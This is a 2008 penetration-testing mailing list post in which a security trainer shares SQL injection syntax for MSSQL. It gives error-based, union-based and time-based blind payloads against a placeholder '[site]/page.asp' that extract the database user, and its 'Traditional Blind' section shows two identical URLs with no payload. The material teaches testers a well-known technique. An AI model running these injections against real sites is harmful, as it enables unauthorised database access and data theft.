Penetration Testing mailing list archives
SQL Injection Techniques (favorite syntaxes)...help requested...
From: Joseph McCray <joe () learnsecurityonline com>
Date: Fri, 13 Jun 2008 18:31:19 -0400
Hey everybody, I'm working on a few projects related to SQL Injection and trying to kill a few birds with 1 stone. I'm curious what are your favorite methods for identifying and exploiting SQL Injection. I'm looking for example syntax here that you've found has worked well for you in the past. Here are a few snippets of techniques I like to use, I'm looking for example syntax for data exfiltration via DNS, and IDS Evasion with SQL Injection. Error-Based ##################################################### Error-Based SQL Injection Syntax for extracting the USER http://[site]/page.asp?id=1 or 1=convert(int,(USER))-- Syntax error converting the nvarchar value '[DB USER]' to a column of data type int. Union-Based ##################################################### Union-Based SQL Injection Syntax for extracting the USER http://[site]/page.asp?id=1 UNION SELECT ALL 1-- All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. http://[site]/page.asp?id=1 UNION SELECT ALL 1,2-- All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3-- All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists. http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4-- NO ERROR http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4-- Traditional Blind ##################################################### http://[site]/page.asp?id=1 http://[site]/page.asp?id=1 Time-Based Blind ##################################################### Blind SQL Injection Syntax for extracting the USER 3 - Total Characters http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'-- http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'-- http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds) D - 1st Character http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'-- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'-- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds) B - 2nd Character http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds) O - 3rd Character http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'-- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- (+10 seconds) http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'-- http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds) Database User = DBO -- Joe McCray Toll Free: 1-866-892-2132 Email: joe () learnsecurityonline com Web: https://www.learnsecurityonline.com Learn Security Online, Inc. * Security Games * Simulators * Challenge Servers * Courses * Hacking Competitions * Hacklab Access "The only thing worse than training good employees and losing them is NOT training your employees and keeping them." - Zig Ziglar
Attachment:
signature.asc
Description: This is a digitally signed message part
Current thread:
- SQL Injection Techniques (favorite syntaxes)...help requested... Joseph McCray (Jun 13)
- Re: SQL Injection Techniques (favorite syntaxes)...help requested... Roy Firestein (Jun 15)